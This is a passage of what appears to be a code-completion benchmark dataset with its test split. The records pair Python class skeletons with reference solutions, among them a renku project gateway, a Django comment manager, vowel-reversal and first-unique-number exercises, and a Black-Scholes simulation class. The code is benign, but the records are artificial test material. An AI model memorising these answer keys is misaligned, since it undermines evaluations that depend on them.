<|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000488", "length_bytes": 1889, "license_type": "permissive", "methods": [{"docstring": "Get project metadata.", "name": "get_project", "signature": "def get_project(self) -> Project"}, {"docstring": "Update project metadata.", "name": "update_project", "signature": "def update_project(self, project: Project)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002754", "prompt": "Implement the Python class `ProjectGateway` described below.\n\nClass description:\nGateway for project database operations.\n\nMethod signatures and docstrings:\n- def get_project(self) -> Project: Get project metadata.\n- def update_project(self, project: Project): Update project metadata.", "prompted_full_text": "Implement the Python class `ProjectGateway` described below.\n\nClass description:\nGateway for project database operations.\n\nMethod signatures and docstrings:\n- def get_project(self) -> Project: Get project metadata.\n- def update_project(self, project: Project): Update project metadata.\n\n<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n <|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "revision_id": "449ec7bca1cc435e5a8ceb278e49a422b953bb09", "skeleton": "<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n <|body_0|>\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n\n def update_project(self, project: Project):\n \"\"\"Update project metadata.\"\"\"\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n", "source": "the_stack_v2_python_sparse", "source_path": "renku/core/metadata/gateway/project_gateway.py", "source_repo": "code-inflation/renku-python", "split": "test", "star_events_count": 0} {"blob_id": "af0bb29f4dc9d611f315eb7dc2da56779673a3f0", "bodies": ["content_type = ContentType.objects.get_for_model(instance.__class__)\nobj_id = instance.id\nqueryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\nreturn queryset", "content_type = ContentType.objects.get(model=instance)\nprint(content_type)\nuuid = uuid_generator()\nif parent_obj:\n parent_obj = parent_obj\ncomment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\nreturn comment_form"], "bodies_text": "<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "class_docstring": "ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.", "class_name": "CommentManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000489", "length_bytes": 7695, "license_type": "permissive", "methods": [{"docstring": "to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.", "name": "filter_by_model", "signature": "def filter_by_model(self, instance)"}, {"docstring": "tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).", "name": "form_create_by_model", "signature": "def form_create_by_model(self, instance, object_id, user, content, parent_obj=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005456", "prompt": "Implement the Python class `CommentManager` described below.\n\nClass description:\nye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\n\nMethod signatures and docstrings:\n- def filter_by_model(self, instance): to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\n- def form_create_by_model(self, instance, object_id, user, content, parent_obj=None): tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).", "prompted_full_text": "Implement the Python class `CommentManager` described below.\n\nClass description:\nye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\n\nMethod signatures and docstrings:\n- def filter_by_model(self, instance): to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\n- def form_create_by_model(self, instance, object_id, user, content, parent_obj=None): tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\n\n<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n<|end_body_1|>\n", "revision_id": "aef47922fdd6488550881ed9d42bf30a0d33a32a", "skeleton": "<|skeleton|>\nclass CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n <|body_0|>\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentManager:\n \"\"\"ye custom filter sakhtim ke to view ya (model property) rahat tar betunim content_object vase comment haro bargardoonim.\"\"\"\n\n def filter_by_model(self, instance):\n \"\"\"to khat e zir ma az instance.__class__ estefade kardim ke modelio migire ke to view ya to (model propert) behesh pas midim.\"\"\"\n content_type = ContentType.objects.get_for_model(instance.__class__)\n obj_id = instance.id\n queryset = super(CommentManager, self).filter(content_type=content_type, object_id=obj_id).filter(parent=None)\n return queryset\n\n def form_create_by_model(self, instance, object_id, user, content, parent_obj=None):\n \"\"\"tu inja darim modeli ke dare request midea ro migirim(filter_by_model) baad bayad check konim bebinim model.exists ya na age bud daghighan mesle form to view ammal mikonim (bedoone commit=False). vase API content o bayad shabihe request begirm(validated_data.get('content')).\"\"\"\n content_type = ContentType.objects.get(model=instance)\n print(content_type)\n uuid = uuid_generator()\n if parent_obj:\n parent_obj = parent_obj\n comment_form = super(CommentManager, self).create(user=user, content=content, content_type=content_type, object_id=object_id, parent=parent_obj, uuid=uuid)\n return comment_form\n", "source": "the_stack_v2_python_sparse", "source_path": "src/comments/models.py", "source_repo": "m3h-D/Myinfoblog", "split": "test", "star_events_count": 0} {"blob_id": "6566b3e449e5d21a61522a3d9cc0267bc93c703a", "bodies": ["vowels = ['a', 'e', 'i', 'o', 'u']\ni = 0\nj = len(s) - 1\ns = list(s)\nwhile i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\nreturn ''.join(s)", "vowels = ['a', 'e', 'i', 'o', 'u']\ni = 0\nj = len(s) - 1\ns = list(s)\nwhile i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\nreturn ''.join(s)"], "bodies_text": "<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000490", "length_bytes": 1707, "license_type": "no_license", "methods": [{"docstring": ":type s: str :rtype: str", "name": "reverseVowels", "signature": "def reverseVowels(self, s)"}, {"docstring": ":type s: str :rtype: str", "name": "reverseVowels1", "signature": "def reverseVowels1(self, s)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseVowels(self, s): :type s: str :rtype: str\n- def reverseVowels1(self, s): :type s: str :rtype: str", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseVowels(self, s): :type s: str :rtype: str\n- def reverseVowels1(self, s): :type s: str :rtype: str\n\n<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_0|>\n\n<|body_start_1|>\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n<|end_body_1|>\n", "revision_id": "c55b0cfd2967a2221c27ed738e8de15034775945", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_0|>\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseVowels(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels and s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n elif s[i].lower() not in vowels and s[j].lower() not in vowels:\n i += 1\n j -= 1\n elif s[i].lower() in vowels and s[j].lower() not in vowels:\n j -= 1\n else:\n i += 1\n return ''.join(s)\n\n def reverseVowels1(self, s):\n \"\"\":type s: str :rtype: str\"\"\"\n vowels = ['a', 'e', 'i', 'o', 'u']\n i = 0\n j = len(s) - 1\n s = list(s)\n while i < j:\n if s[i].lower() in vowels:\n if s[j].lower() in vowels:\n s[i], s[j] = (s[j], s[i])\n i += 1\n j -= 1\n else:\n j -= 1\n elif s[j].lower() not in vowels:\n i += 1\n j -= 1\n else:\n i += 1\n return ''.join(s)\n", "source": "the_stack_v2_python_sparse", "source_path": "PycharmProjects/leetcode/UsingArray/ReverseVowelsOfaString.py", "source_repo": "crystal30/DataStructure", "split": "test", "star_events_count": 0} {"blob_id": "52c5e2c4087f40244dd3beac172b3d00beee0244", "bodies": ["self.queue = deque([])\ncount = Counter(nums)\nself.judge = {}\nfor num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False", "while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\nif self.queue:\n return self.queue[0]\nreturn -1", "if value not in self.judge:\n self.judge[value] = True\nelse:\n self.judge[value] = False\nself.queue.append(value)"], "bodies_text": "<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "FirstUnique", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000491", "length_bytes": 1725, "license_type": "no_license", "methods": [{"docstring": "count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True", "name": "__init__", "signature": "def __init__(self, nums: List[int])"}, {"docstring": "if not self.unique: return -1 for item in self.unique: return item", "name": "showFirstUnique", "signature": "def showFirstUnique(self) -> int"}, {"docstring": "if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True", "name": "add", "signature": "def add(self, value: int) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005562", "prompt": "Implement the Python class `FirstUnique` described below.\n\nClass description:\nImplement the FirstUnique class.\n\nMethod signatures and docstrings:\n- def __init__(self, nums: List[int]): count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\n- def showFirstUnique(self) -> int: if not self.unique: return -1 for item in self.unique: return item\n- def add(self, value: int) -> None: if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True", "prompted_full_text": "Implement the Python class `FirstUnique` described below.\n\nClass description:\nImplement the FirstUnique class.\n\nMethod signatures and docstrings:\n- def __init__(self, nums: List[int]): count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\n- def showFirstUnique(self) -> int: if not self.unique: return -1 for item in self.unique: return item\n- def add(self, value: int) -> None: if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\n\n<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n<|end_body_0|>\n\n<|body_start_1|>\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n<|end_body_2|>\n", "revision_id": "90fd00246707b23d60a5d13b5a89d5b5f64ad008", "skeleton": "<|skeleton|>\nclass FirstUnique:\n\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n <|body_0|>\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n <|body_1|>\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FirstUnique:\n def __init__(self, nums: List[int]):\n \"\"\"count = Counter(nums) self.unique = {} self.other = {} for item in nums: if count[item]==1: self.unique[item] = True else: if item not in self.other: self.other[item] = True\"\"\"\n self.queue = deque([])\n count = Counter(nums)\n self.judge = {}\n for num in nums:\n self.queue.append(num)\n if count[num] == 1:\n self.judge[num] = True\n else:\n self.judge[num] = False\n\n def showFirstUnique(self) -> int:\n \"\"\"if not self.unique: return -1 for item in self.unique: return item\"\"\"\n while self.queue and (not self.judge[self.queue[0]]):\n self.queue.popleft()\n if self.queue:\n return self.queue[0]\n return -1\n\n def add(self, value: int) -> None:\n \"\"\"if value not in self.other and value not in self.unique: self.unique[value] = True return if value in self.unique: self.unique.pop(value) self.other[value] = True\"\"\"\n if value not in self.judge:\n self.judge[value] = True\n else:\n self.judge[value] = False\n self.queue.append(value)\n", "source": "the_stack_v2_python_sparse", "source_path": "python_solution/1429.py", "source_repo": "Dongzi-dq394/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "37df6ce18c4ba8d1992ec9b70dd9bffc2ee55246", "bodies": ["self.numberOfSimulations = numberOfSimulations\nself.T = T\nself.initialValue = initialValue\nself.sigma = sigma\nself.r = r\nnp.random.seed(seed)", "standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\nfirstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\ndef BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\nblackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\nreturn blackScholesRealizations", "standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\nfirstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\nblackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\nreturn blackScholesRealizations"], "bodies_text": "<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "class_docstring": "In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r", "class_name": "GenerateBlackScholes", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000492", "length_bytes": 5988, "license_type": "no_license", "methods": [{"docstring": "Parameters ---------- 